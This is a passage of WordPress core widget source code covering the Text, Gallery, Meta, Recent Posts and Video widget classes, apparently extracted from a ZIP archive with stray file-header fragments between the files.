	 * Enqueues preview scripts.
	 *
	 * These scripts normally are enqueued just-in-time when a playlist shortcode is used.
	 * However, in the customizer, a playlist shortcode may be used in a text widget and
	 * dynamically added via selective refresh, so it is important to unconditionally enqueue them.
	 *
	 * @since 4.9.3
	 */
	public function enqueue_preview_scripts() {
		require_once dirname( __DIR__ ) . '/media.php';

		wp_playlist_scripts( 'audio' );
		wp_playlist_scripts( 'video' );
	}

	/**
	 * Loads the required scripts and styles for the widget control.
	 *
	 * @since 4.8.0
	 */
	public function enqueue_admin_scripts() {
		wp_enqueue_editor();
		wp_enqueue_media();
		wp_enqueue_script( 'text-widgets' );
		wp_add_inline_script( 'text-widgets', sprintf( 'wp.textWidgets.idBases.push( %s );', wp_json_encode( $this->id_base, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) ) );
		wp_add_inline_script( 'text-widgets', 'wp.textWidgets.init();', 'after' );
	}

	/**
	 * Outputs the Text widget settings form.
	 *
	 * @since 2.8.0
	 * @since 4.8.0 Form only contains hidden inputs which are synced with JS template.
	 * @since 4.8.1 Restored original form to be displayed when in legacy mode.
	 *
	 * @see WP_Widget_Text::render_control_template_scripts()
	 * @see _WP_Editors::editor()
	 *
	 * @param array $instance Current settings.
	 */
	public function form( $instance ) {
		$instance = wp_parse_args(
			(array) $instance,
			array(
				'title' => '',
				'text'  => '',
			)
		);
		?>
		<?php if ( ! $this->is_legacy_instance( $instance ) ) : ?>
			<?php

			if ( user_can_richedit() ) {
				add_filter( 'the_editor_content', 'format_for_editor', 10, 2 );
				$default_editor = 'tinymce';
			} else {
				$default_editor = 'html';
			}

			/** This filter is documented in wp-includes/class-wp-editor.php */
			$text = apply_filters( 'the_editor_content', $instance['text'], $default_editor );

			// Reset filter addition.
			if ( user_can_richedit() ) {
				remove_filter( 'the_editor_content', 'format_for_editor' );
			}

			// Prevent premature closing of textarea in case format_for_editor() didn't apply or the_editor_content filter did a wrong thing.
			$escaped_text = preg_replace( '#</textarea#i', '&lt;/textarea', $text );

			?>
			<input id="<?php echo $this->get_field_id( 'title' ); ?>" name="<?php echo $this->get_field_name( 'title' ); ?>" class="title sync-input" type="hidden" value="<?php echo esc_attr( $instance['title'] ); ?>">
			<textarea id="<?php echo $this->get_field_id( 'text' ); ?>" name="<?php echo $this->get_field_name( 'text' ); ?>" class="text sync-input" hidden><?php echo $escaped_text; ?></textarea>
			<input id="<?php echo $this->get_field_id( 'filter' ); ?>" name="<?php echo $this->get_field_name( 'filter' ); ?>" class="filter sync-input" type="hidden" value="on">
			<input id="<?php echo $this->get_field_id( 'visual' ); ?>" name="<?php echo $this->get_field_name( 'visual' ); ?>" class="visual sync-input" type="hidden" value="on">
		<?php else : ?>
			<input id="<?php echo $this->get_field_id( 'visual' ); ?>" name="<?php echo $this->get_field_name( 'visual' ); ?>" class="visual" type="hidden" value="">
			<p>
				<label for="<?php echo $this->get_field_id( 'title' ); ?>"><?php _e( 'Title:' ); ?></label>
				<input class="widefat" id="<?php echo $this->get_field_id( 'title' ); ?>" name="<?php echo $this->get_field_name( 'title' ); ?>" type="text" value="<?php echo esc_attr( $instance['title'] ); ?>" />
			</p>
			<?php
			if ( ! isset( $instance['visual'] ) ) {
				$widget_info_message = __( 'This widget may contain code that may work better in the &#8220;Custom HTML&#8221; widget. How about trying that widget instead?' );
			} else {
				$widget_info_message = __( 'This widget may have contained code that may work better in the &#8220;Custom HTML&#8221; widget. If you have not yet, how about trying that widget instead?' );
			}

			wp_admin_notice(
				$widget_info_message,
				array(
					'type'               => 'info',
					'additional_classes' => array( 'notice-alt', 'inline' ),
				)
			);
			?>
			<p>
				<label for="<?php echo $this->get_field_id( 'text' ); ?>"><?php _e( 'Content:' ); ?></label>
				<textarea class="widefat" rows="16" cols="20" id="<?php echo $this->get_field_id( 'text' ); ?>" name="<?php echo $this->get_field_name( 'text' ); ?>"><?php echo esc_textarea( $instance['text'] ); ?></textarea>
			</p>
			<p>
				<input id="<?php echo $this->get_field_id( 'filter' ); ?>" name="<?php echo $this->get_field_name( 'filter' ); ?>" type="checkbox"<?php checked( ! empty( $instance['filter'] ) ); ?> />&nbsp;<label for="<?php echo $this->get_field_id( 'filter' ); ?>"><?php _e( 'Automatically add paragraphs' ); ?></label>
			</p>
			<?php
		endif;
	}

	/**
	 * Renders form template scripts.
	 *
	 * @since 4.8.0
	 * @since 4.9.0 The method is now static.
	 */
	public static function render_control_template_scripts() {
		$dismissed_pointers = explode( ',', (string) get_user_meta( get_current_user_id(), 'dismissed_wp_pointers', true ) );
		?>
		<script type="text/html" id="tmpl-widget-text-control-fields">
			<# var elementIdPrefix = 'el' + String( Math.random() ).replace( /\D/g, '' ) + '_' #>
			<p>
				<label for="{{ elementIdPrefix }}title"><?php esc_html_e( 'Title:' ); ?></label>
				<input id="{{ elementIdPrefix }}title" type="text" class="widefat title">
			</p>

			<?php if ( ! in_array( 'text_widget_custom_html', $dismissed_pointers, true ) ) : ?>
				<div hidden class="wp-pointer custom-html-widget-pointer wp-pointer-top">
					<div class="wp-pointer-content">
						<h3><?php _e( 'New Custom HTML Widget' ); ?></h3>
						<?php if ( is_customize_preview() ) : ?>
							<p><?php _e( 'Did you know there is a &#8220;Custom HTML&#8221; widget now? You can find it by pressing the &#8220;<a class="add-widget" href="#">Add a Widget</a>&#8221; button and searching for &#8220;HTML&#8221;. Check it out to add some custom code to your site!' ); ?></p>
						<?php else : ?>
							<p><?php _e( 'Did you know there is a &#8220;Custom HTML&#8221; widget now? You can find it by scanning the list of available widgets on this screen. Check it out to add some custom code to your site!' ); ?></p>
						<?php endif; ?>
						<div class="wp-pointer-buttons">
							<a class="close" href="#"><?php _e( 'Dismiss' ); ?></a>
						</div>
					</div>
					<div class="wp-pointer-arrow">
						<div class="wp-pointer-arrow-inner"></div>
					</div>
				</div>
			<?php endif; ?>

			<?php if ( ! in_array( 'text_widget_paste_html', $dismissed_pointers, true ) ) : ?>
				<div hidden class="wp-pointer paste-html-pointer wp-pointer-top">
					<div class="wp-pointer-content">
						<h3><?php _e( 'Did you just paste HTML?' ); ?></h3>
						<p><?php _e( 'Hey there, looks like you just pasted HTML into the &#8220;Visual&#8221; tab of the Text widget. You may want to paste your code into the &#8220;Code&#8221; tab instead. Alternately, try out the new &#8220;Custom HTML&#8221; widget!' ); ?></p>
						<div class="wp-pointer-buttons">
							<a class="close" href="#"><?php _e( 'Dismiss' ); ?></a>
						</div>
					</div>
					<div class="wp-pointer-arrow">
						<div class="wp-pointer-arrow-inner"></div>
					</div>
				</div>
			<?php endif; ?>

			<p>
				<label for="{{ elementIdPrefix }}text" class="screen-reader-text"><?php /* translators: Hidden accessibility text. */ esc_html_e( 'Content:' ); ?></label>
				<textarea id="{{ elementIdPrefix }}text" class="widefat text wp-editor-area" style="height: 200px" rows="16" cols="20"></textarea>
			</p>
		</script>
		<?php
	}
}
PK     \)|  |  !  class-wp-widget-media-gallery.phpnu [        <?php
/**
 * Widget API: WP_Widget_Media_Gallery class
 *
 * @package WordPress
 * @subpackage Widgets
 * @since 4.9.0
 */

/**
 * Core class that implements a gallery widget.
 *
 * @since 4.9.0
 *
 * @see WP_Widget_Media
 * @see WP_Widget
 */
class WP_Widget_Media_Gallery extends WP_Widget_Media {

	/**
	 * Constructor.
	 *
	 * @since 4.9.0
	 */
	public function __construct() {
		parent::__construct(
			'media_gallery',
			__( 'Gallery' ),
			array(
				'description' => __( 'Displays an image gallery.' ),
				'mime_type'   => 'image',
			)
		);

		$this->l10n = array_merge(
			$this->l10n,
			array(
				'no_media_selected' => __( 'No images selected' ),
				'add_media'         => _x( 'Add Images', 'label for button in the gallery widget; should not be longer than ~13 characters long' ),
				'replace_media'     => '',
				'edit_media'        => _x( 'Edit Gallery', 'label for button in the gallery widget; should not be longer than ~13 characters long' ),
			)
		);
	}

	/**
	 * Get schema for properties of a widget instance (item).
	 *
	 * @since 4.9.0
	 *
	 * @see WP_REST_Controller::get_item_schema()
	 * @see WP_REST_Controller::get_additional_fields()
	 * @link https://core.trac.wordpress.org/ticket/35574
	 *
	 * @return array Schema for properties.
	 */
	public function get_instance_schema() {
		$schema = array(
			'title'          => array(
				'type'                  => 'string',
				'default'               => '',
				'sanitize_callback'     => 'sanitize_text_field',
				'description'           => __( 'Title for the widget' ),
				'should_preview_update' => false,
			),
			'ids'            => array(
				'type'              => 'array',
				'items'             => array(
					'type' => 'integer',
				),
				'default'           => array(),
				'sanitize_callback' => 'wp_parse_id_list',
			),
			'columns'        => array(
				'type'    => 'integer',
				'default' => 3,
				'minimum' => 1,
				'maximum' => 9,
			),
			'size'           => array(
				'type'    => 'string',
				'enum'    => array_merge( get_intermediate_image_sizes(), array( 'full', 'custom' ) ),
				'default' => 'thumbnail',
			),
			'link_type'      => array(
				'type'                  => 'string',
				'enum'                  => array( 'post', 'file', 'none' ),
				'default'               => 'post',
				'media_prop'            => 'link',
				'should_preview_update' => false,
			),
			'orderby_random' => array(
				'type'                  => 'boolean',
				'default'               => false,
				'media_prop'            => '_orderbyRandom',
				'should_preview_update' => false,
			),
		);

		/** This filter is documented in wp-includes/widgets/class-wp-widget-media.php */
		$schema = apply_filters( "widget_{$this->id_base}_instance_schema", $schema, $this );

		return $schema;
	}

	/**
	 * Render the media on the frontend.
	 *
	 * @since 4.9.0
	 *
	 * @param array $instance Widget instance props.
	 */
	public function render_media( $instance ) {
		$instance = array_merge( wp_list_pluck( $this->get_instance_schema(), 'default' ), $instance );

		$shortcode_atts = array_merge(
			$instance,
			array(
				'link' => $instance['link_type'],
			)
		);

		// @codeCoverageIgnoreStart
		if ( $instance['orderby_random'] ) {
			$shortcode_atts['orderby'] = 'rand';
		}

		// @codeCoverageIgnoreEnd
		echo gallery_shortcode( $shortcode_atts );
	}

	/**
	 * Loads the required media files for the media manager and scripts for media widgets.
	 *
	 * @since 4.9.0
	 */
	public function enqueue_admin_scripts() {
		parent::enqueue_admin_scripts();

		$handle = 'media-gallery-widget';
		wp_enqueue_script( $handle );

		$exported_schema = array();
		foreach ( $this->get_instance_schema() as $field => $field_schema ) {
			$exported_schema[ $field ] = wp_array_slice_assoc( $field_schema, array( 'type', 'default', 'enum', 'minimum', 'format', 'media_prop', 'should_preview_update', 'items' ) );
		}
		wp_add_inline_script(
			$handle,
			sprintf(
				'wp.mediaWidgets.modelConstructors[ %s ].prototype.schema = %s;',
				wp_json_encode( $this->id_base, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ),
				wp_json_encode( $exported_schema, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES )
			)
		);

		wp_add_inline_script(
			$handle,
			sprintf(
				'
					wp.mediaWidgets.controlConstructors[ %1$s ].prototype.mime_type = %2$s;
					_.extend( wp.mediaWidgets.controlConstructors[ %1$s ].prototype.l10n, %3$s );
				',
				wp_json_encode( $this->id_base, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ),
				wp_json_encode( $this->widget_options['mime_type'], JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ),
				wp_json_encode( $this->l10n, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES )
			)
		);
	}

	/**
	 * Render form template scripts.
	 *
	 * @since 4.9.0
	 */
	public function render_control_template_scripts() {
		parent::render_control_template_scripts();
		?>
		<script type="text/html" id="tmpl-wp-media-widget-gallery-preview">
			<#
			var ids = _.filter( data.ids, function( id ) {
				return ( id in data.attachments );
			} );
			#>
			<# if ( ids.length ) { #>
				<ul class="gallery media-widget-gallery-preview" role="list">
					<# _.each( ids, function( id, index ) { #>
						<# var attachment = data.attachments[ id ]; #>
						<# if ( index < 6 ) { #>
							<li class="gallery-item">
								<div class="gallery-icon">
									<img alt="{{ attachment.alt }}"
										<# if ( index === 5 && data.ids.length > 6 ) { #> aria-hidden="true" <# } #>
										<# if ( attachment.sizes.thumbnail ) { #>
											src="{{ attachment.sizes.thumbnail.url }}" width="{{ attachment.sizes.thumbnail.width }}" height="{{ attachment.sizes.thumbnail.height }}"
										<# } else { #>
											src="{{ attachment.url }}"
										<# } #>
										<# if ( ! attachment.alt && attachment.filename ) { #>
											aria-label="
											<?php
											echo esc_attr(
												sprintf(
													/* translators: %s: The image file name. */
													__( 'The current image has no alternative text. The file name is: %s' ),
													'{{ attachment.filename }}'
												)
											);
											?>
											"
										<# } #>
									/>
									<# if ( index === 5 && data.ids.length > 6 ) { #>
									<div class="gallery-icon-placeholder">
										<p class="gallery-icon-placeholder-text" aria-label="
										<?php
											printf(
												/* translators: %s: The amount of additional, not visible images in the gallery widget preview. */
												__( 'Additional images added to this gallery: %s' ),
												'{{ data.ids.length - 5 }}'
											);
										?>
										">+{{ data.ids.length - 5 }}</p>
									</div>
									<# } #>
								</div>
							</li>
						<# } #>
					<# } ); #>
				</ul>
			<# } else { #>
				<div class="attachment-media-view">
					<button type="button" class="placeholder button-add-media"><?php echo esc_html( $this->l10n['add_media'] ); ?></button>
				</div>
			<# } #>
		</script>
		<?php
	}

	/**
	 * Whether the widget has content to show.
	 *
	 * @since 4.9.0
	 *
	 * @param array $instance Widget instance props.
	 * @return bool Whether widget has content.
	 */
	protected function has_content( $instance ) {
		if ( ! empty( $instance['ids'] ) ) {
			$attachments = wp_parse_id_list( $instance['ids'] );
			// Prime attachment post caches.
			_prime_post_caches( $attachments, false, false );
			foreach ( $attachments as $attachment ) {
				if ( 'attachment' !== get_post_type( $attachment ) ) {
					return false;
				}
			}
			return true;
		}
		return false;
	}
}
PK     \h=      class-wp-widget-meta.phpnu [        <?php
/**
 * Widget API: WP_Widget_Meta class
 *
 * @package WordPress
 * @subpackage Widgets
 * @since 4.4.0
 */

/**
 * Core class used to implement a Meta widget.
 *
 * Displays log in/out, RSS feed links, etc.
 *
 * @since 2.8.0
 *
 * @see WP_Widget
 */
class WP_Widget_Meta extends WP_Widget {

	/**
	 * Sets up a new Meta widget instance.
	 *
	 * @since 2.8.0
	 */
	public function __construct() {
		$widget_ops = array(
			'classname'                   => 'widget_meta',
			'description'                 => __( 'Login, RSS, &amp; WordPress.org links.' ),
			'customize_selective_refresh' => true,
			'show_instance_in_rest'       => true,
		);
		parent::__construct( 'meta', __( 'Meta' ), $widget_ops );
	}

	/**
	 * Outputs the content for the current Meta widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @param array $args     Display arguments including 'before_title', 'after_title',
	 *                        'before_widget', and 'after_widget'.
	 * @param array $instance Settings for the current Meta widget instance.
	 */
	public function widget( $args, $instance ) {
		$default_title = __( 'Meta' );
		$title         = ! empty( $instance['title'] ) ? $instance['title'] : $default_title;

		/** This filter is documented in wp-includes/widgets/class-wp-widget-pages.php */
		$title = apply_filters( 'widget_title', $title, $instance, $this->id_base );

		echo $args['before_widget'];

		if ( $title ) {
			echo $args['before_title'] . $title . $args['after_title'];
		}

		$format = current_theme_supports( 'html5', 'navigation-widgets' ) ? 'html5' : 'xhtml';

		/** This filter is documented in wp-includes/widgets/class-wp-nav-menu-widget.php */
		$format = apply_filters( 'navigation_widgets_format', $format );

		if ( 'html5' === $format ) {
			// The title may be filtered: Strip out HTML and make sure the aria-label is never empty.
			$title      = trim( strip_tags( $title ) );
			$aria_label = $title ? $title : $default_title;
			echo '<nav aria-label="' . esc_attr( $aria_label ) . '">';
		}
		?>

		<ul>
			<?php wp_register(); ?>
			<li><?php wp_loginout(); ?></li>
			<li><a href="<?php echo esc_url( get_bloginfo( 'rss2_url' ) ); ?>"><?php _e( 'Entries feed' ); ?></a></li>
			<li><a href="<?php echo esc_url( get_bloginfo( 'comments_rss2_url' ) ); ?>"><?php _e( 'Comments feed' ); ?></a></li>

			<?php
			/**
			 * Filters the "WordPress.org" list item HTML in the Meta widget.
			 *
			 * @since 3.6.0
			 * @since 4.9.0 Added the `$instance` parameter.
			 *
			 * @param string $html     Default HTML for the WordPress.org list item.
			 * @param array  $instance Array of settings for the current widget.
			 */
			echo apply_filters(
				'widget_meta_poweredby',
				sprintf(
					'<li><a href="%1$s">%2$s</a></li>',
					esc_url( __( 'https://wordpress.org/' ) ),
					__( 'WordPress.org' )
				),
				$instance
			);

			wp_meta();
			?>

		</ul>

		<?php
		if ( 'html5' === $format ) {
			echo '</nav>';
		}

		echo $args['after_widget'];
	}

	/**
	 * Handles updating settings for the current Meta widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @param array $new_instance New settings for this instance as input by the user via
	 *                            WP_Widget::form().
	 * @param array $old_instance Old settings for this instance.
	 * @return array Updated settings to save.
	 */
	public function update( $new_instance, $old_instance ) {
		$instance          = $old_instance;
		$instance['title'] = sanitize_text_field( $new_instance['title'] );

		return $instance;
	}

	/**
	 * Outputs the settings form for the Meta widget.
	 *
	 * @since 2.8.0
	 *
	 * @param array $instance Current settings.
	 */
	public function form( $instance ) {
		$instance = wp_parse_args( (array) $instance, array( 'title' => '' ) );
		?>
		<p>
			<label for="<?php echo $this->get_field_id( 'title' ); ?>"><?php _e( 'Title:' ); ?></label>
			<input class="widefat" id="<?php echo $this->get_field_id( 'title' ); ?>" name="<?php echo $this->get_field_name( 'title' ); ?>" type="text" value="<?php echo esc_attr( $instance['title'] ); ?>" />
		</p>
		<?php
	}
}
PK     \2  2     class-wp-widget-recent-posts.phpnu [        <?php
/**
 * Widget API: WP_Widget_Recent_Posts class
 *
 * @package WordPress
 * @subpackage Widgets
 * @since 4.4.0
 */

/**
 * Core class used to implement a Recent Posts widget.
 *
 * @since 2.8.0
 *
 * @see WP_Widget
 */
class WP_Widget_Recent_Posts extends WP_Widget {

	/**
	 * Sets up a new Recent Posts widget instance.
	 *
	 * @since 2.8.0
	 */
	public function __construct() {
		$widget_ops = array(
			'classname'                   => 'widget_recent_entries',
			'description'                 => __( 'Your site&#8217;s most recent Posts.' ),
			'customize_selective_refresh' => true,
			'show_instance_in_rest'       => true,
		);
		parent::__construct( 'recent-posts', __( 'Recent Posts' ), $widget_ops );
		$this->alt_option_name = 'widget_recent_entries';
	}

	/**
	 * Outputs the content for the current Recent Posts widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @param array $args     Display arguments including 'before_title', 'after_title',
	 *                        'before_widget', and 'after_widget'.
	 * @param array $instance Settings for the current Recent Posts widget instance.
	 */
	public function widget( $args, $instance ) {
		if ( ! isset( $args['widget_id'] ) ) {
			$args['widget_id'] = $this->id;
		}

		$default_title = __( 'Recent Posts' );
		$title         = ( ! empty( $instance['title'] ) ) ? $instance['title'] : $default_title;

		/** This filter is documented in wp-includes/widgets/class-wp-widget-pages.php */
		$title = apply_filters( 'widget_title', $title, $instance, $this->id_base );

		$number = ( ! empty( $instance['number'] ) ) ? absint( $instance['number'] ) : 5;
		if ( ! $number ) {
			$number = 5;
		}
		$show_date = isset( $instance['show_date'] ) ? $instance['show_date'] : false;

		$r = new WP_Query(
			/**
			 * Filters the arguments for the Recent Posts widget.
			 *
			 * @since 3.4.0
			 * @since 4.9.0 Added the `$instance` parameter.
			 *
			 * @see WP_Query::get_posts()
			 *
			 * @param array $args     An array of arguments used to retrieve the recent posts.
			 * @param array $instance Array of settings for the current widget.
			 */
			apply_filters(
				'widget_posts_args',
				array(
					'posts_per_page'      => $number,
					'no_found_rows'       => true,
					'post_status'         => 'publish',
					'ignore_sticky_posts' => true,
				),
				$instance
			)
		);

		if ( ! $r->have_posts() ) {
			return;
		}
		?>

		<?php echo $args['before_widget']; ?>

		<?php
		if ( $title ) {
			echo $args['before_title'] . $title . $args['after_title'];
		}

		$format = current_theme_supports( 'html5', 'navigation-widgets' ) ? 'html5' : 'xhtml';

		/** This filter is documented in wp-includes/widgets/class-wp-nav-menu-widget.php */
		$format = apply_filters( 'navigation_widgets_format', $format );

		if ( 'html5' === $format ) {
			// The title may be filtered: Strip out HTML and make sure the aria-label is never empty.
			$title      = trim( strip_tags( $title ) );
			$aria_label = $title ? $title : $default_title;
			echo '<nav aria-label="' . esc_attr( $aria_label ) . '">';
		}
		?>

		<ul>
			<?php foreach ( $r->posts as $recent_post ) : ?>
				<?php
				$post_title   = get_the_title( $recent_post->ID );
				$title        = ( ! empty( $post_title ) ) ? $post_title : __( '(no title)' );
				$aria_current = '';

				if ( get_queried_object_id() === $recent_post->ID ) {
					$aria_current = ' aria-current="page"';
				}
				?>
				<li>
					<a href="<?php the_permalink( $recent_post->ID ); ?>"<?php echo $aria_current; ?>><?php echo $title; ?></a>
					<?php if ( $show_date ) : ?>
						<span class="post-date"><?php echo get_the_date( '', $recent_post->ID ); ?></span>
					<?php endif; ?>
				</li>
			<?php endforeach; ?>
		</ul>

		<?php
		if ( 'html5' === $format ) {
			echo '</nav>';
		}

		echo $args['after_widget'];
	}

	/**
	 * Handles updating the settings for the current Recent Posts widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @param array $new_instance New settings for this instance as input by the user via
	 *                            WP_Widget::form().
	 * @param array $old_instance Old settings for this instance.
	 * @return array Updated settings to save.
	 */
	public function update( $new_instance, $old_instance ) {
		$instance              = $old_instance;
		$instance['title']     = sanitize_text_field( $new_instance['title'] );
		$instance['number']    = (int) $new_instance['number'];
		$instance['show_date'] = isset( $new_instance['show_date'] ) ? (bool) $new_instance['show_date'] : false;
		return $instance;
	}

	/**
	 * Outputs the settings form for the Recent Posts widget.
	 *
	 * @since 2.8.0
	 *
	 * @param array $instance Current settings.
	 */
	public function form( $instance ) {
		$title     = isset( $instance['title'] ) ? esc_attr( $instance['title'] ) : '';
		$number    = isset( $instance['number'] ) ? absint( $instance['number'] ) : 5;
		$show_date = isset( $instance['show_date'] ) ? (bool) $instance['show_date'] : false;
		?>
		<p>
			<label for="<?php echo $this->get_field_id( 'title' ); ?>"><?php _e( 'Title:' ); ?></label>
			<input class="widefat" id="<?php echo $this->get_field_id( 'title' ); ?>" name="<?php echo $this->get_field_name( 'title' ); ?>" type="text" value="<?php echo $title; ?>" />
		</p>

		<p>
			<label for="<?php echo $this->get_field_id( 'number' ); ?>"><?php _e( 'Number of posts to show:' ); ?></label>
			<input class="tiny-text" id="<?php echo $this->get_field_id( 'number' ); ?>" name="<?php echo $this->get_field_name( 'number' ); ?>" type="number" step="1" min="1" value="<?php echo $number; ?>" size="3" />
		</p>

		<p>
			<input class="checkbox" type="checkbox"<?php checked( $show_date ); ?> id="<?php echo $this->get_field_id( 'show_date' ); ?>" name="<?php echo $this->get_field_name( 'show_date' ); ?>" />
			<label for="<?php echo $this->get_field_id( 'show_date' ); ?>"><?php _e( 'Display post date?' ); ?></label>
		</p>
		<?php
	}
}
PK     \[Bz"  z"    class-wp-widget-media-video.phpnu [        <?php
/**
 * Widget API: WP_Widget_Media_Video class
 *
 * @package WordPress
 * @subpackage Widgets
 * @since 4.8.0
 */

/**
 * Core class that implements a video widget.
 *
 * @since 4.8.0
 *
 * @see WP_Widget_Media
 * @see WP_Widget
 */
class WP_Widget_Media_Video extends WP_Widget_Media {

	/**
	 * Constructor.
	 *
	 * @since 4.8.0
	 */
	public function __construct() {
		parent::__construct(
			'media_video',
			__( 'Video' ),
			array(
				'description' => __( 'Displays a video from the media library or from YouTube, Vimeo, or another provider.' ),
				'mime_type'   => 'video',
			)
		);

		$this->l10n = array_merge(
			$this->l10n,
			array(
				'no_media_selected'          => __( 'No video selected' ),
				'add_media'                  => _x( 'Add Video', 'label for button in the video widget' ),
				'replace_media'              => _x( 'Replace Video', 'label for button in the video widget; should preferably not be longer than ~13 characters long' ),
				'edit_media'                 => _x( 'Edit Video', 'label for button in the video widget; should preferably not be longer than ~13 characters long' ),
				'missing_attachment'         => sprintf(
					/* translators: %s: URL to media library. */
					__( 'That video cannot be found. Check your <a href="%s">media library</a> and make sure it was not deleted.' ),
					esc_url( admin_url( 'upload.php' ) )
				),
				/* translators: %d: Widget count. */
				'media_library_state_multi'  => _n_noop( 'Video Widget (%d)', 'Video Widget (%d)' ),
				'media_library_state_single' => __( 'Video Widget' ),
				/* translators: %s: A list of valid video file extensions. */
				'unsupported_file_type'      => sprintf( __( 'Sorry, the video at the supplied URL cannot be loaded. Please check that the URL is for a supported video file (%s) or stream (e.g. YouTube and Vimeo).' ), '<code>.' . implode( '</code>, <code>.', wp_get_video_extensions() ) . '</code>' ),
			)
		);
	}

	/**
	 * Get schema for properties of a widget instance (item).
	 *
	 * @since 4.8.0
	 *
	 * @see WP_REST_Controller::get_item_schema()
	 * @see WP_REST_Controller::get_additional_fields()
	 * @link https://core.trac.wordpress.org/ticket/35574
	 *
	 * @return array Schema for properties.
	 */
	public function get_instance_schema() {

		$schema = array(
			'preload' => array(
				'type'                  => 'string',
				'enum'                  => array( 'none', 'auto', 'metadata' ),
				'default'               => 'metadata',
				'description'           => __( 'Preload' ),
				'should_preview_update' => false,
			),
			'loop'    => array(
				'type'                  => 'boolean',
				'default'               => false,
				'description'           => __( 'Loop' ),
				'should_preview_update' => false,
			),
			'content' => array(
				'type'                  => 'string',
				'default'               => '',
				'sanitize_callback'     => 'wp_kses_post',
				'description'           => __( 'Tracks (subtitles, captions, descriptions, chapters, or metadata)' ),
				'should_preview_update' => false,
			),
		);

		foreach ( wp_get_video_extensions() as $video_extension ) {
			$schema[ $video_extension ] = array(
				'type'        => 'string',
				'default'     => '',
				'format'      => 'uri',
				/* translators: %s: Video extension. */
				'description' => sprintf( __( 'URL to the %s video source file' ), $video_extension ),
			);
		}

		return array_merge( $schema, parent::get_instance_schema() );
	}

	/**
	 * Render the media on the frontend.
	 *
	 * @since 4.8.0
	 *
	 * @param array $instance Widget instance props.
	 */
	public function render_media( $instance ) {
		$instance   = array_merge( wp_list_pluck( $this->get_instance_schema(), 'default' ), $instance );
		$attachment = null;

		if ( $this->is_attachment_with_mime_type( $instance['attachment_id'], $this->widget_options['mime_type'] ) ) {
			$attachment = get_post( $instance['attachment_id'] );
		}

		$src = $instance['url'];
		if ( $attachment ) {
			$src = wp_get_attachment_url( $attachment->ID );
		}

		if ( empty( $src ) ) {
			return;
		}

		$youtube_pattern = '#^https?://(?:www\.)?(?:youtube\.com/watch|youtu\.be/)#';
		$vimeo_pattern   = '#^https?://(.+\.)?vimeo\.com/.*#';

		if ( $attachment || preg_match( $youtube_pattern, $src ) || preg_match( $vimeo_pattern, $src ) ) {
			add_filter( 'wp_video_shortcode', array( $this, 'inject_video_max_width_style' ) );

			echo wp_video_shortcode(
				array_merge(
					$instance,
					compact( 'src' )
				),
				$instance['content']
			);

			remove_filter( 'wp_video_shortcode', array( $this, 'inject_video_max_width_style' ) );
		} else {
			echo $this->inject_video_max_width_style( wp_oembed_get( $src ) );
		}
	}

	/**
	 * Inject max-width and remove height for videos too constrained to fit inside sidebars on frontend.
	 *
	 * @since 4.8.0
	 *
	 * @param string $html Video shortcode HTML output.
	 * @return string HTML Output.
	 */
	public function inject_video_max_width_style( $html ) {
		$html = preg_replace( '/\sheight="\d+"/', '', $html );
		$html = preg_replace( '/\swidth="\d+"/', '', $html );
		$html = preg_replace( '/(?<=width:)\s*\d+px(?=;?)/', '100%', $html );
		return $html;
	}

	/**
	 * Enqueue preview scripts.
	 *
	 * These scripts normally are enqueued just-in-time when a video shortcode is used.
	 * In the customizer, however, widgets can be dynamically added and rendered via
	 * selective refresh, and so it is important to unconditionally enqueue them in
	 * case a widget does get added.
	 *
	 * @since 4.8.0
	 */
	public function enqueue_preview_scripts() {
		/** This filter is documented in wp-includes/media.php */
		if ( 'mediaelement' === apply_filters( 'wp_video_shortcode_library', 'mediaelement' ) ) {
			wp_enqueue_style( 'wp-mediaelement' );
			wp_enqueue_script( 'mediaelement-vimeo' );
			wp_enqueue_script( 'wp-mediaelement' );
		}
	}

	/**
	 * Loads the required scripts and styles for the widget control.
	 *
	 * @since 4.8.0
	 */
	public function enqueue_admin_scripts() {
		parent::enqueue_admin_scripts();

		$handle = 'media-video-widget';
		wp_enqueue_script( $handle );

		$exported_schema = array();
		foreach ( $this->get_instance_schema() as $field => $field_schema ) {
			$exported_schema[ $field ] = wp_array_slice_assoc( $field_schema, array( 'type', 'default', 'enum', 'minimum', 'format', 'media_prop', 'should_preview_update' ) );
		}
		wp_add_inline_script(
			$handle,
			sprintf(
				'wp.mediaWidgets.modelConstructors[ %s ].prototype.schema = %s;',
				wp_json_encode( $this->id_base, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ),
				wp_json_encode( $exported_schema, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES )
			)
		);

		wp_add_inline_script(
			$handle,
			sprintf(
				'
					wp.mediaWidgets.controlConstructors[ %1$s ].prototype.mime_type = %2$s;
					wp.mediaWidgets.controlConstructors[ %1$s ].prototype.l10n = _.extend( {}, wp.mediaWidgets.controlConstructors[ %1$s ].prototype.l10n, %3$s );
				',
				wp_json_encode( $this->id_base, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ),
				wp_json_encode( $this->widget_options['mime_type'], JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ),
				wp_json_encode( $this->l10n, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES )
			)
		);
	}

	/**
	 * Render form template scripts.
	 *
	 * @since 4.8.0
	 */
	public function render_control_template_scripts() {
		parent::render_control_template_scripts()
		?>
		<script type="text/html" id="tmpl-wp-media-widget-video-preview">
			<# if ( data.error && 'missing_attachment' === data.error ) { #>
				<?php
				wp_admin_notice(
					$this->l10n['missing_attachment'],
					array(
						'type'               => 'error',
						'additional_classes' => array( 'notice-alt', 'notice-missing-attachment' ),
					)
				);
				?>
			<# } else if ( data.error && 'unsupported_file_type' === data.error ) { #>
				<?php
				wp_admin_notice(
					$this->l10n['unsupported_file_type'],
					array(
						'type'               => 'error',
						'additional_classes' => array( 'notice-alt', 'notice-missing-attachment' ),
					)
				);
				?>
			<# } else if ( data.error ) { #>
				<?php
				wp_admin_notice(
					__( 'Unable to preview media due to an unknown error.' ),
					array(
						'type'               => 'error',
